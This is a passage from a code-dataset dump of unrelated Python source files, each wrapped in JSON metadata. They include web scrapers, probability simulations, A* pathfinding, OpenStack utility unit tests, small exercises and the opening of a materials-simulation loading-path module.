print(\"안녕하세요\")\n\n\nif __name__ == '__main__':\n    main()","repo_name":"eagle705/pytorch-bert-crf-ner","sub_path":"data_utils/vocab_tokenizer.py","file_name":"vocab_tokenizer.py","file_ext":"py","file_size_in_byte":9808,"program_lang":"python","lang":"en","doc_type":"code","stars":457,"dataset":"github-code","pt":"72"} +{"seq_id":"19190671730","text":"import numpy as np \nimport matplotlib.pyplot as plt\nfrom scipy.optimize import rosen, differential_evolution, minimize\nfrom scipy import stats\n\n# 
converges to a very small tolerance, something like 10^-19\n# num_seeds = 10\n\n# for d in range(2,21): # loop over problem dimension\n# for seed in range(num_seeds):\n# np.random.seed(seed)\n# bounds = [(0,2)]*d\n# result = differential_evolution(rosen, bounds, polish=False)\n# # result = minimize(rosen, x0=np.random.uniform(0,2,d), bounds=bounds)\n# print('%d %d %d' % (d,seed,result.nfev))\n\n\n# after running all of that and saving it to text files...\n\nA = np.loadtxt('data/de-scaling-results.txt')\n# A = np.loadtxt('data/bfgs-scaling-results.txt')\n\nx = np.log(A[:,0])\ny = np.log(A[:,2])\nplt.scatter(x,y)\n\nslope,intercept,rvalue,pvalue,stderr = stats.linregress(x,y)\n\nplt.plot([np.min(x), np.max(x)], [intercept + np.min(x)*slope, intercept + np.max(x)*slope], color='indianred', linewidth=2)\nplt.text(1.0,10, 'slope = %0.2f' % slope, fontsize=16)\n\nplt.xlabel('# Decision Variables')\nplt.ylabel('NFE to converge')\nplt.title('DE - Rosenbrock function')\nplt.show()","repo_name":"jdherman/eci263","sub_path":"L13-scalability-scipy.py","file_name":"L13-scalability-scipy.py","file_ext":"py","file_size_in_byte":1125,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"72"} +{"seq_id":"14989913929","text":"import re\nimport requests\nfrom bs4 import BeautifulSoup\n\n \n\n\ndef scrape_english(): \n print(\"오늘의 영어 회화\")\n url = \"https://www.hackers.co.kr/?c=s_eng/eng_contents/I_others_english&keywd=haceng_submain_lnb_eng_I_others_english&logger_kw=haceng_submain_lnb_eng_I_others_english#;\"\n res = requests.get(url, headers={'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36'})\n soup = BeautifulSoup(res.text,\"lxml\")\n sentences = soup.find_all(\"div\",attrs={\"id\":re.compile(\"^conv_kor_t\")})\n\n\n print(\"영어 지문\")\n for sentence in sentences[len(sentences)//2:]:\n print(sentence.get_text().strip())\n\n print()\n\n print(\"한글 지문\")\n for sentence in sentences[:len(sentences)//2]:\n print(sentence.get_text().strip())\n\nif __name__ == \"__main__\":\n scrape_english() # 오늘의 영어 회화 가져오기\n","repo_name":"JinSuJinSu/Python-web-crawling","sub_path":"web-crawling4.py","file_name":"web-crawling4.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32064979357","text":"\"\"\"\n Aula 01 - \nLançamento de uma moeda justa: S = {h, t} => P(h) = P(t) = 1/2\n\ne = {sair h}\n\nLançamento de duas moedas não viciadas.\ne = {ambas sairem h}\n\nLançamento de um dado e de uma moeda, ambos justos.\ne = {sair t na moeda e 3 no dado}\n\"\"\"\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef coin_flip_experiment():\n \"\"\"[summary]\n\n Returns:\n [type]: [description]\n \"\"\"\n coin_1 = ['h', 't']\n coin_2 = ['h', 't']\n \n flip_result_1 = np.random.choice(coin_1)\n flip_result_2 = np.random.choice(coin_2)\n\n if flip_result_1 == 'h' and flip_result_2 == 'h':\n return 1\n else:\n return 0\n\ndef coin_dice_experiment():\n \"\"\"[summary]\n\n Returns:\n [type]: [description]\n \"\"\"\n dice = ['1', '2', '3', '4', '5', '6']\n coin = ['h', 't']\n\n coin_result = np.random.choice(coin)\n dice_result = np.random.choice(dice)\n\n if dice_result == '3' and coin_result == 't':\n return 1\n else:\n return 0\n\n\ndef gen_graph(exact_value, n_runs, prob, runs):\n \"\"\"constrói o gráfico das simulações\n\n Args:\n exact_value (float): [description]\n n_runs (int)): [description]\n prob 
(list): [description]\n runs (list): [description]\n \"\"\"\n plt.hlines(exact_value, 0, n_runs, colors='brown', label='valor exato = 1/12')\n plt.plot(runs, prob, label='Lançamento de uma moeda e de um dado de 6 lados')\n plt.xlabel('# de lançamentos')\n plt.ylabel('Probabilidade de sair {hh} E {3}')\n plt.legend()\n plt.show()\n\n\ndef main():\n n_runs = 100000\n count = 0\n exact_value = 1/12\n\n prob = []\n runs = []\n\n for run in range(n_runs):\n count += coin_dice_experiment()\n prob.append(count/(run+1))\n runs.append(run+1)\n\n gen_graph(exact_value, n_runs, prob, runs) \n\nif __name__ == '__main__':\n main()","repo_name":"jrsmoura/topicos-avancados","sub_path":"aula-01/coin_flip.py","file_name":"coin_flip.py","file_ext":"py","file_size_in_byte":1857,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"35841212208","text":"import itertools\n\nfrom bs4 import BeautifulSoup\n\nfrom ..db.models import ContactType\nfrom .parserBase import Parser\n\n\nclass OptunionParser(Parser):\n def __init__(self):\n super().__init__()\n\n self.SITE_ROOT = \"https://www.opt-union.ru\"\n\n\n def parse_listing(self, url):\n companies = set()\n\n for page in itertools.count(start=1):\n previous_len = len(companies)\n\n resp = self.sess.get(url, params={\"page\": page})\n with open(\"result.html\", \"w\", encoding=\"utf8\") as file:\n file.write(resp.text)\n\n soup = BeautifulSoup(resp.text, \"lxml\")\n\n divs = soup.find_all(\"div\", attrs={\"class\": \"data-block bordered\"})\n\n try:\n companies.update([div.find_all(\"a\")[0].get(\"href\") for div in divs[1:]])\n\n # Page change layout\n except AttributeError:\n print(\"Change layout\")\n break\n\n if previous_len == len(companies):\n break\n\n return list(map(lambda company: self.SITE_ROOT + company, companies))\n\n\n def parse_vendor(self, url):\n resp = self.sess.get(url)\n\n soup = BeautifulSoup(resp.text, \"lxml\")\n\n try:\n # Getting name and drop extra substrings\n name = soup.find(\"h1\").text.removesuffix(\" - о компании\").removesuffix(\" - список товаров\")\n\n # Getting company's description\n description = soup.find(\"div\", attrs={\"class\": \"data-block\"}).text.strip()\n\n # Trying to get multiply phone numbers\n country = self.__find_by_property_name(soup, \"Страна\")\n city = self.__find_by_property_name(soup, \"Город\")\n address = self.__find_by_property_name(soup, \"Адрес\")\n\n contacts = {}\n phones = self.__find_by_property_name(soup, \"Телефон\")\n if phones: \n contacts[ContactType.PHONE] = phones.split(\",\")\n website = self.__find_by_property_name(soup, \"Интернет\")\n if website: \n contacts[ContactType.WEBSITE] = [website]\n\n return {\n \"url\": url,\n \"name\": name,\n \"description\": description,\n \"country\": country,\n \"city\": city,\n \"address\": address,\n \"contacts\": contacts,\n }\n except AttributeError as e:\n return None\n\n\n def parse_vendors(self, url):\n vendor_urls = self.parse_listing(url)\n vendors = list(map(self.parse_vendor, vendor_urls))\n\n return vendors\n\n\n @staticmethod\n def __find_by_property_name(soup, property_name):\n property_tag = soup.find(\"div\", attrs={\"class\": \"itemLeft\"}, string=property_name)\n if property_tag:\n value = property_tag.findNext(\"div\", attrs={\"class\": \"itemRight\"}).text\n\n return value\n else:\n return 
None","repo_name":"ArtemiyMalau/leadersofdigital2021","sub_path":"py/parsers/optunionParser.py","file_name":"optunionParser.py","file_ext":"py","file_size_in_byte":2988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26258232373","text":"class Wallet:\n def stacked(self,value):\n notes = []\n for e in range(0,10):\n notes.append(value)\n return notes\n \n def __init__(self):\n self.price = 0\n self.coins = 0\n self.fives = self.stacked(5)\n self.tens = self.stacked(10)\n self.twenties = self.stacked(20)\n self.fifties = self.stacked(50)\n self.hundreds = self.stacked(100)\n \n def pay(self):\n price = int(input(\"Price $\"))\n self.price = price\n while price >= 5:\n if price >= 100: \n self.hundreds.pop()\n price -= 100\n elif price >= 50:\n self.fifties.pop()\n price -= 50\n elif price >= 20:\n self.twenties.pop()\n price -= 20\n elif price >= 10:\n self.tens.pop()\n price -= 10\n else:\n price -= 5\n self.fives.pop()\n self.coins = price\n \n def used(self,*args):\n return 10 - len(*args) \n \n def notes(self,*args):\n return f'- uses {self.used(*args)}' if self.used(*args) >= 0 else ''\n \n def show(self):\n self.pay()\n print(f'Wallet:\\n{self.notes(self.hundreds)} notes of 100\\n{self.notes(self.fifties)} notes of 50\\n{self.notes(self.twenties)} notes of 20\\n{self.notes(self.tens)} notes of 10\\n{self.notes(self.fives)} notes of 5\\n- used {self.coins} coins\\n')\n \ndef main():\n Wallet().show()\n \nif __name__ == '__main__':\n main()\n \n \n \n \n ","repo_name":"Georges034302/fsd_python","sub_path":"labs/lab07/exercise2.py","file_name":"exercise2.py","file_ext":"py","file_size_in_byte":1639,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"71217222953","text":"\"\"\"\r\n\"abacabad\" c\r\n\"abacabaabacaba\" _\r\n\"abcdefghijklmnopqrstuvwxyziflskecznslkjfabe\" d\r\n\"bcccccccccccccyb\" y\r\n\"\"\"\r\n\r\ndef first_not_repeating_char(char_sequence):\r\n\r\n for idx, char in enumerate(char_sequence):\r\n duplicate = False\r\n\r\n for c in (char_sequence[idx + 1: len(char_sequence)]):\r\n if char == c:\r\n duplicate = True\r\n break\r\n\r\n for c in (char_sequence[0: idx - 1]):\r\n if char == c:\r\n duplicate = True\r\n break\r\n\r\n if duplicate == False:\r\n return char\r\n\r\n return '_'\r\n\r\n\r\nif __name__ == '__main__':\r\n char_sequence = str(raw_input('Escribe una secuencia de caracteres: '))\r\n\r\n result = first_not_repeating_char(char_sequence)\r\n\r\n if result == '_':\r\n print('Todos los caracteres se repiten.')\r\n else:\r\n print('El primer caracter no repetido es: {}'.format(result))\r\n","repo_name":"AdrianOrtiga/Python","sub_path":"repetidos.py","file_name":"repetidos.py","file_ext":"py","file_size_in_byte":923,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13615767687","text":"from django.core.cache import cache\nimport mock\nimport unittest\n\nfrom newton_base import util\nfrom newton_base.tests import mock_info\n\n\nclass TestUtil(unittest.TestCase):\n\n def test_get_query(self):\n query_string = \"name=ferret&color=purple\"\n mock_request = mock.Mock()\n mock_request.get_full_path.side_effect = [\n \"path/to/page?\" + query_string,\n \"path/to/page\"\n ]\n\n self.assertEqual(\n query_string, util.VimDriverUtils.get_query_part(\n mock_request))\n self.assertEqual(\n \"\", util.VimDriverUtils.get_query_part( mock_request))\n\n def 
test_get_new_openstack_v2_session_with_tenant_id(self):\n vim_info = mock_info.MOCK_VIM_INFO.copy()\n vim_info[\"url\"] = \"http://128.224.180.14:5000/v2\"\n tenant_it = \"1a62b3971d774404a504c5d9a3e506e3\"\n\n os_session = util.VimDriverUtils.get_session(\n vim_info, tenant_it)\n\n self.assertIsNotNone(os_session)\n self.assertIsNotNone(os_session.auth)\n self.assertEqual(vim_info[\"url\"], os_session.auth.auth_url)\n self.assertEqual(vim_info[\"userName\"],\n os_session.auth.username)\n self.assertEqual(vim_info[\"password\"],\n os_session.auth.password)\n\n def test_get_new_openstack_v3_session_with_project_id(self):\n projectid = \"1a62b3971d774404a504c5d9a3e506e3\"\n os_session = util.VimDriverUtils.get_session(\n mock_info.MOCK_VIM_INFO, projectid)\n\n self.assertIsNotNone(os_session)\n self.assertIsNotNone(os_session.auth)\n self.assertEqual(mock_info.MOCK_VIM_INFO[\"url\"],\n os_session.auth.auth_url)\n self.assertEqual(mock_info.MOCK_VIM_INFO[\"domain\"],\n os_session.auth.project_domain_name)\n self.assertEqual(projectid,\n os_session.auth.project_id)\n\n def test_get_new_openstack_session_with_project_id(self):\n vim_info = mock_info.MOCK_VIM_INFO.copy()\n vim_info[\"url\"] = \"http://128.224.180.14:5000\"\n project_id = \"1a62b3971d774404a504c5d9a3e506e3\"\n\n os_session = util.VimDriverUtils.get_session(\n vim_info, project_id)\n\n self.assertIsNotNone(os_session)\n self.assertIsNotNone(os_session.auth)\n self.assertEqual(vim_info[\"url\"] + \"/v3\",\n os_session.auth.auth_url[0])\n\n def test_get_new_openstack_v3_session_with_project_name(self):\n project_name = \"demo\"\n os_session = util.VimDriverUtils.get_session(\n mock_info.MOCK_VIM_INFO, tenant_name=project_name)\n\n self.assertIsNotNone(os_session)\n self.assertIsNotNone(os_session.auth)\n self.assertEqual(project_name,\n os_session.auth.project_name)\n\n def test_get_auth_state_from_valid_session(self):\n test_result = \"auth_state\"\n\n mock_auth = mock.Mock()\n mock_auth.get_auth_state.return_value = test_result\n mock_session = mock.Mock()\n mock_session._auth_required.return_value = mock_auth\n\n auth_state = util.VimDriverUtils.get_auth_state(mock_session)\n\n self.assertIsNotNone(auth_state)\n self.assertEqual(test_result, auth_state)\n\n def test_get_auth_state_from_invalid_session(self):\n mock_session = mock.Mock()\n mock_session._auth_required.return_value = None\n\n self.assertIsNone(util.VimDriverUtils.get_auth_state(\n mock_session))\n\n @mock.patch.object(cache, 'get')\n def test_get_valid_tokens_from_cache(self, mock_cache_get):\n mock_cache_get.return_value = \"valid_token\"\n\n token, meta_token = util.VimDriverUtils.get_token_cache(\n \"token\")\n self.assertIsNotNone(token)\n self.assertIsNotNone(meta_token)\n\n @mock.patch.object(cache, 'get')\n def test_update_cache_expired_info(self, mock_cache_get):\n mock_cache_get.return_value = None\n\n util.VimDriverUtils.update_token_cache(\n \"token\", \"auth_state\", \"metadata\")\n\n @mock.patch.object(cache, 'get')\n def test_update_cache_info(self, mock_cache_get):\n mock_cache_get.return_value = \"existing\"\n\n util.VimDriverUtils.update_token_cache(\n \"token\", \"auth_state\", \"metadata\")\n\n def test_replace_keys_of_dict(self):\n dict_obj = {\n \"project_id\": \"demo\",\n \"ram\": \"16G\"\n }\n new_keys = [\"tenantId\", \"memory\"]\n mapping = [(o, n) for o, n in zip(list(dict_obj.keys()), new_keys)]\n util.VimDriverUtils.replace_key_by_mapping(\n dict_obj, mapping)\n\n self.assertEqual(len(new_keys), len(list(dict_obj.keys())))\n 
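        # A minimal sketch of the key-renaming behaviour exercised here, under
        # the assumption (not verified against the ONAP source) that
        # replace_key_by_mapping walks the (old, new) pairs roughly like:
        #     for old_key, new_key in mapping:
        #         dict_obj[new_key] = dict_obj.pop(old_key)
        # so after the call only the new keys remain, which the surrounding
        # assertions check.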
self.assertEqual(sorted(new_keys), sorted(list(dict_obj.keys())))\n\n    def test_replace_keys_reverse_order(self):\n        dict_obj = {\n            \"project_id\": \"demo\",\n            \"ram\": \"16G\"\n        }\n        new_keys = [\"tenantId\", \"memory\"]\n        mapping = [(n, o) for o, n in zip(list(dict_obj.keys()), new_keys)]\n        util.VimDriverUtils.replace_key_by_mapping(\n            dict_obj, mapping, reverse=True)\n\n        self.assertEqual(len(new_keys), len(list(dict_obj.keys())))\n        self.assertEqual(sorted(new_keys), sorted(list(dict_obj.keys())))\n","repo_name":"onap/multicloud-openstack","sub_path":"newton/newton/requests/tests/test_util.py","file_name":"test_util.py","file_ext":"py","file_size_in_byte":5278,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"}
+{"seq_id":"37392053699","text":"# count palindromic numbers in [L, R]\nL, R = map(int, input().split())\n\ncount = 0\n\nfor x in range(L, R+1):\n\n    S = str(x)\n    flag = True\n    N = len(S)\n    for i in range(N):\n        if S[i] != S[(N-1)-i]:\n            flag = False\n    if flag:\n        count += 1\n\nprint(count)","repo_name":"tetutetu214/lesson_python","sub_path":"0930.py","file_name":"0930.py","file_ext":"py","file_size_in_byte":209,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"37387461956","text":"import gridworld\nfrom ai import *\nfrom math import *\nfrom queue import PriorityQueue\n\n#-------------A* pathfinding algorithms--------------\n# NOTE: All A* are based off of sequential-heuristic.\n#       We use h = inf as a dummy heuristic to make\n#       the supplemental heuristics useless\n\n# Default A*\n# map: Gridworld terrain map\n# start: Tuple representing start coordinates in (x, y)\n# goal: Tuple representing goal coordinates in (x, y)\ndef default(map, start, goal):\n    return weighted(map, start, goal, 1)\n\n# Weighted\n# map: Gridworld terrain map\n# start: Tuple representing start coordinates in (x, y)\n# goal: Tuple representing goal coordinates in (x, y)\n# h: Heuristic function, default h_pythagorean\n# w: Weight, default 1.0\ndef weighted(map, start, goal, w=1, h = h_pythagorean):\n    return sequential(map, start, goal, w, 1, [h, lambda **kwa: inf])\n\n# Uniform-cost\n# map: Gridworld terrain map\n# start: Tuple representing start coordinates in (x, y)\n# goal: Tuple representing goal coordinates in (x, y)\ndef uniform(map, start, goal):\n    return weighted(map, start, goal, 0, h_uniform_first)\n\n# Sequential-Heuristic\n# map: Gridworld terrain map\n# start: Tuple representing start coordinate in (x, y)\n# goal: Tuple representing goal coordinate in (x, y)\n# w: Overall weight, default 1.25\n# w2: Inadmissible-favored weight, default 2\n# list_h: List of heuristic functions to iterate over, list_h[0] is the anchor heuristic\ndef sequential(map, start, goal, w = 1.25, w2 = 2, list_h = all_heuristics):\n    rows = len(map)\n    cols = len(map[0])\n    n_h = len(list_h)\n    expansions = 0\n    # one fringe (priority queue) per heuristic\n    fringes = [PriorityQueue() for i in range(n_h)]\n    closed = []\n\n    parent_set = {k: {i: {j: None for j in range(cols)} for i in range(rows)} for k in range(n_h)}\n    f_set = {k: {i: {j: inf for j in range(cols)} for i in range(rows)} for k in range(n_h)}\n    g_set = {k: {i: {j: inf for j in range(cols)} for i in range(rows)} for k in range(n_h)}\n    h_set = {k: {i: {j: list_h[k](start = start, goal = goal, v = (j, i)) for j in range(cols)} for i in range(rows)} for k in range(n_h)}\n\n    for i in range(n_h):\n        f_set[i][start[1]][start[0]] = 0 + w * h_set[i][start[1]][start[0]]\n        g_set[i][start[1]][start[0]] = 0\n        fringes[i].put((f_set[i][start[1]][start[0]], start))\n\n    while 
fringes[0].queue[0][0] < inf:\n for k in range(1, n_h):\n minkey = fringes[0].queue[0][0]\n minkey2 = fringes[k].queue[0][0]\n\n # 0th key or ith key has the current smallest fscore \n min_i = k if minkey2 <= w2 * minkey else 0\n\n fringe = fringes[min_i]\n parent = parent_set[min_i]\n f = f_set[min_i]\n g = g_set[min_i]\n h = h_set[min_i]\n\n pop = fringe.get() \n s = pop[1]\n\n if g[goal[1]][goal[0]] <= pop[0] and g[goal[1]][goal[0]] < inf: # End goal \n s = goal \n ret = {'f': f, 'g': g, \"h\": h, 'map': [s]}\n print(\"Expansions: \", expansions)\n\n while parent[s[1]][s[0]] != None:\n s = parent[s[1]][s[0]]\n ret['map'].insert(0, s)\n \n return ret\n\n for i in range(max(0, s[1] - 1), min(rows, s[1] + 2)):\n for j in range(max(0, s[0] - 1), min(cols, s[0] + 2)):\n s_p = (j, i)\n\n if s_p == s:\n continue\n\n g_temp = g[s[1]][s[0]] + cost(map, s, s_p)\n\n if s_p not in closed and g_temp < g[i][j]:\n parent[i][j] = s\n g[i][j] = g_temp\n f[i][j] = g[i][j] + w * h[i][j]\n expansions += 1\n in_fringe = False\n with fringe.mutex:\n in_fringe = s_p in fringe.queue\n\n if not in_fringe:\n fringe.put((f[i][j], s_p))\n\n print(\"failed\")\n return None\n","repo_name":"Endoman123/informed-search","sub_path":"a_star.py","file_name":"a_star.py","file_ext":"py","file_size_in_byte":4038,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71826347752","text":"\"\"\"\nLearn about Python return semantics and how Python functions handles arguments\n\"\"\"\n\ndef egg(var):\n \"\"\"\n returns the variable back to the user\n :param var: input object\n :return: input object\n \"\"\"\n return var\n\n# Required parameters must come first\n# Optional parameters after required parameters\ndef banner(message, border_character='*'):\n \"\"\"\n Print message in banner form\n :param message: String to print\n :param border: border character for string\n :return:\n \"\"\"\n #length = __len__(message)\n length = message.__len__() +4\n length = len(message) +4\n print_border = border_character*length\n print(print_border)\n print(border_character + \" \" + message + \" \" + border_character )\n print(print_border)\n\ndef add_spam(menu = None):\n \"\"\"\n Add spam to the menu list\n :param menu:\n :return: menu list\n \"\"\"\n if menu is None:\n menu = []\n\n menu.append('spam')\n return menu\n\n\ndef sum_two(num1, num2=8):\n \"\"\"\n Sum two input objects\n :param num1: object 1\n :param num2: object 2 (optional), default = 8\n :return: sum of objects\n \"\"\"\n return num1+num2\n\n\ndef test():\n \"\"\"\n Test function\n :return:\n \"\"\"\n c = [6, 10, 20]\n e = egg(c)\n print(c is e)\n n1=3\n n2=9\n print(n1 , \" + \" , n2, \" = \", sum_two(n1, n2))\n print(sum_two(\"Happy \", \"New Year\"))\n print(sum_two(n1))\n banner(\"Weber State University\")\n banner(\"Weber State University\",\"$\")\n\n breakfast = ['eggs', 'bacon']\n print(\"Before\", breakfast)\n add_spam(breakfast)\n print(\"After\", breakfast)\n\nprint(__name__)\n\nif __name__ == '__main__':\n test()\n exit(0)\n\n","repo_name":"pjbeeli/BeginPythonSum2019","sub_path":"return_semantics.py","file_name":"return_semantics.py","file_ext":"py","file_size_in_byte":1664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20433419446","text":"import os\nimport csv\n\ndef main():\n\n with open('results.txt', 'r') as rcsv:\n content = csv.reader(rcsv)\n\n for row in content:\n new_row = row[1].split(\",\")\n\n renew = new_row[0].split(']')\n row = 
renew[0]\n\n            with open('AgeDomain.csv', 'a') as wcsv:\n                csv_write = csv.writer(wcsv)\n                # write the value as a single field; passing a bare string\n                # would split it into one column per character\n                csv_write.writerow([row])\n\n\nif __name__ == '__main__':\n    main()","repo_name":"jimwangzx/Phishing-Detection-2","sub_path":"Scripts/nomefile.py","file_name":"nomefile.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"70026179753","text":"#!/usr/bin/env python\n\"\"\"\nStart module of simple REST messages service\n\"\"\"\n\n__version__ = \"0.0.1\"\n__author__ = \"@pejot\"\n\nimport logging\nimport tornado\nimport tornado.ioloop\nimport tornado.web\nfrom tornado.options import options, parse_config_file, define\nfrom handlers.home import HomeHandler\n\n\nclass Server:\n\n    @classmethod\n    def get_app(cls):\n        return tornado.web.Application(\n            [\n                (r\"/\", HomeHandler),\n            ],\n        )\n\n\ndef main():\n    define(\"port\", default=8888, type=int)\n    define(\"db\", default=\":memory:\")\n    define(\"db_echo\", default=True)\n    parse_config_file(\"application.cfg\")\n    logging.info(\"Starting tornado server\")\n    Server.get_app().listen(options.port)\n    tornado.ioloop.IOLoop.instance().start()\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"speedingdeer/real_time_massages_service","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":785,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"73701485672","text":"import pandas as pd\nimport csv\nimport requests\nfrom bs4 import BeautifulSoup\n\n#Boilerplate BeautifulSoup stuff and url\npage = requests.get('https://en.wikipedia.org/wiki/List_of_American_artists_1900_and_after')\nsoup = BeautifulSoup(page.text, 'html.parser')\n\n#Searching for target html div\ntarget_class = soup.find(class_='mw-parser-output')\ntarget_div = target_class.find_all('ul')\n\ncsv_list = []\n\nfor info in target_div[2:]:\n\tfor individual_artist in info.find_all('li'):\n\t\tlist_ = individual_artist.text.split(' ')\n\t\tcsv_list.append(list_)\n\nmodified_list = []\n\nfor entry in csv_list:\n\tentry[:] = [' '.join(entry[:])]\n\tfor chars in entry:\n\t\tmodified_entry = chars.replace('(', ' ').replace('-', ' ').replace('\u2013', ' ').replace(')', '').replace(' born ', ' ').replace('c.', ' ').replace(' and ', ' ').replace(',', '').replace(' ', ' ')\n\t\tn = modified_entry.split(' ')\n\t\tmodified_list.append(n)\n\n#Prints neatly to console\nfor index in modified_list:\n\tprint(index)\n\n#Writes data to output file\nwith open(\"output.csv\", \"w\") as f:\n    writer = csv.writer(f)\n    writer.writerows(modified_list)\n","repo_name":"nznyn/scrangler","sub_path":"scrange_wip.py","file_name":"scrange_wip.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"6571787491","text":"from moola.core import _monthly_spend\nfrom moola.models import Money, Transaction\n\n\ndef test_calc_monthly_spend_just_balances():\n    start_balance = Money(2500)\n    end_balance = Money(500)\n\n    assert _monthly_spend(start_balance, end_balance) == Money(2000)\n\n\ndef test_calc_monthly_spend_decimal_balances():\n    start_balance = Money(2500.99)\n    end_balance = Money(500.99)\n\n    monthly_spend = _monthly_spend(start_balance, end_balance)\n\n    # Rounded amounts needed for decimals to match exactly\n    assert monthly_spend.rounded_amount == Money(2000).rounded_amount\n\n\ndef test_calc_monthly_spend_with_transaction():\n    start_balance = Money(2500)\n    
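    # Expected arithmetic, inferred from the assertions in this file rather
    # than from moola's documentation:
    #     monthly spend = (start balance - end balance) + sum(transaction amounts)
    #                   = (2500 - 500) + (-50) = 1950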
end_balance = Money(500)\n    transactions = [Transaction(2, -50, \"Broadband\")]\n\n    monthly_spend = _monthly_spend(start_balance, end_balance, transactions)\n\n    assert monthly_spend == Money(1950)\n\n\ndef test_calc_monthly_spend_with_decimal_transactions():\n    start_balance = Money(2500)\n    end_balance = Money(500)\n    transactions = [Transaction(2, -9.99, \"Netflix\"), Transaction(2, -5.00, \"Spotify\")]\n\n    monthly_spend = _monthly_spend(start_balance, end_balance, transactions)\n\n    # Rounded amounts needed for decimals to match exactly\n    assert monthly_spend.rounded_amount == Money(1985.01).rounded_amount\n","repo_name":"pxg/moola","sub_path":"tests/core/test_montly_spend.py","file_name":"test_montly_spend.py","file_ext":"py","file_size_in_byte":1274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"45027053884","text":"\"\"\"Loading path enforcement and incrementation.\n\nThis module includes several classes that control the general loading\nincrementation flow, namely two classes that allow the enforcement of a\ngeneral non-monotonic loading path (composed of monotonic loading subpaths)\nand two classes that allow rewinding the solution to a past loading increment.\n\nClasses\n-------\nLoadingPath\n    Loading incrementation flow.\nLoadingSubpath\n    Loading subpath.\nIncrementRewinder\n    Rewind analysis to rewind state increment (initial instant).\nRewindManager\n    Manage analysis rewind operations and evaluate analysis rewind criteria.\n\"\"\"\n#\n# Modules\n# =============================================================================\n# Standard\nimport copy\nimport time\n# Third-party\nimport numpy as np\nimport anytree.walker\n# Local\nimport ioput.info as info\nimport ioput.ioutilities as ioutil\nimport tensor.matrixoperations as mop\n#\n# Authorship & Credits\n# =============================================================================\n__author__ = 'Bernardo Ferreira (bernardo_ferreira@brown.edu)'\n__credits__ = ['Bernardo Ferreira', ]\n__status__ = 'Stable'\n# =============================================================================\n#\n# =============================================================================\n#\n# Loading path and subpath\n# =============================================================================\nclass LoadingPath:\n    \"\"\"Loading incrementation flow.\n\n    This class contains a collection of loading subpaths, the current loading\n    state and a set of methods to control the loading incrementation flow.\n\n    Attributes\n    ----------\n    _n_dim : int\n        Problem number of spatial dimensions.\n    _comp_order_sym : list[str]\n        Strain/Stress components symmetric order.\n    _comp_order_nsym : list[str]\n        Strain/Stress components nonsymmetric order.\n    _n_load_subpaths : int\n        Number of loading subpaths.\n    _load_subpaths : list\n        List of LoadingSubpath.\n    _conv_hom_state : dict\n        Converged homogenized state (item, numpy.ndarray of shape (n_comps,))\n        for key in {'strain', 'stress'}.\n    _is_last_inc : bool\n        Loading last increment flag.\n    _n_cinc_cuts : int\n        Consecutive loading increment cuts counter.\n    _increm_state : dict\n        Increment state: key `inc` contains the current increment number (int),\n        key `subpath_id` contains the current loading subpath index (int).\n\n    Methods\n    -------\n    new_load_increment(self)\n        Setup new loading increment and get associated data.\n    increment_cut(self, n_dim, comp_order)\n        Perform loading increment cut and setup new increment.\n    update_hom_state(self, hom_strain_mf, 
hom_stress_mf)\n Update converged homogenized state.\n get_subpath_state(self)\n Get current loading subpath state.\n get_increm_state(self)\n Get incremental state.\n _new_subpath(self)\n Add a new loading subpath to the loading path.\n _get_load_subpath(self)\n Get current loading subpath.\n _update_inc(self)\n Update loading increment counters.\n _get_applied_mac_load(self)\n Compute current applied loading.\n _get_inc_mac_load(self)\n Compute current incremental loading.\n _remove_sym(self, comp_order_sym, comp_order_nsym)\n Remove the symmetric components of loading related objects.\n _get_load_mf(n_dim, comp_order, load_vector)\n Get matricial form of load tensor given in vector form.\n \"\"\"\n def __init__(self, strain_formulation, problem_type, mac_load,\n mac_load_presctype, mac_load_increm, max_subinc_level=5,\n max_cinc_cuts=5):\n \"\"\"Constructor.\n\n Parameters\n ----------\n strain_formulation: {'infinitesimal', 'finite'}\n Problem strain formulation.\n problem_type : int\n Problem type: 2D plane strain (1), 2D plane stress (2),\n 2D axisymmetric (3) and 3D (4).\n mac_load : dict\n For each loading nature type (key, {'strain', 'stress'}), stores\n the loading constraints for each loading subpath in a\n numpy.ndarray (2d), where the i-th row is associated with the i-th\n strain/stress component and the j-th column is associated with the\n j-th loading subpath.\n mac_load_presctype : numpy.ndarray (2d)\n Loading nature type ({'strain', 'stress'}) associated with each\n loading constraint (numpy.ndarrayndarray of shape\n (n_comps, n_load_subpaths)), where the i-th row is associated with\n the i-th strain/stress component and the j-th column is associated\n with the j-th loading subpath.\n mac_load_increm : dict\n For each loading subpath id (key, str), stores a numpy.ndarray of\n shape (n_load_increments, 2) where each row is associated with a\n prescribed loading increment, and the columns 0 and 1 contain the\n corresponding incremental load factor and incremental time,\n respectively.\n max_subinc_level : int, 